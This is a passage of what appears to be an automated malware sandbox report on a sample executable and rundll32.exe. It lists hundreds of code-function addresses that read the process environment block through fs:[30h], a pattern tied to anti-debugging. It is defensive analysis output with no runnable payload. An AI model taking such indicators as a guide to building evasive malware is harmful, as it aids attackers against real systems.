          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01919100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_0191AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01923D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01923D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01923D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01923D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01923D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01923D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01923D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01923D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01923D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01923D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01923D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01923D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01923D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019E8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_0194513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_0194513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_0199A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01944D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01944D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01944D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01934120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01934120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01934120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01934120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01934120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01937D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01953D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_0193B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_0193B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01993540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_0191B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_0191B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_0193C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_0193C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_0191C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_0192849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01919080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01993884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01993884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_0194F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_0194F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_0194F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019590AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019E8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019AB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019AB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019AB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019AB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019AB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019AB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019D14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01996CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01996CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01996CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019158EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019E4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019E4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01997016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01997016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01997016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019E740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019E740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019E740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01996C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01996C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01996C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01996C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_0192B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_0192B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_0192B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_0192B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_0194BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_0194002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_0194002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_0194002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_0194002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_0194002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01930050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01930050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019AC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019AC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_0194A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019E1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019D2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_0193746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01942397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_0194B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01928794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01997794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01997794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01997794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019D138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019CD380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01921B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01921B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01944BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01944BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01944BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019E5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019953CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019953CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019537F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_0193F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019D131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019AFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019AFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019E070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019E070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_0194A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_0194A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_0194E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01914F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01914F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019E8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_0191F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_0191DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_0192EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01943B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01943B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_0191DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_0192FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019E8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_0194D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_0194D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019AFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_0192AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_0192AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_0194FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019E0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019E0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019E0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019946A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019E8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01958EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019436CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019CFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01942ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019276E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01942AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019416E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_0191AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_0191AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_0194A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_0194A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01933A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_0191C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_0191C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_0191C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01948E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01928A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019CFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_0191E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01954A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01954A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019A4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01919240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01919240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01919240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01919240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01927E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01927E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01927E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01927E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01927E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_01927E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_0193AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_0193AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_0193AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_0193AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_0193AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_0195927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019CB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019CB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_019E8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exeCode function: 4_2_0192766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0495849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04949080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_049C3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_049C3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0497F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0497F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0497F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_049890AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_049720A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_049720A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_049720A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_049720A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_049720A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_049720A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_049DB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_049DB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_049DB8D0 mov eax, dword ptr fs:[00000030h]
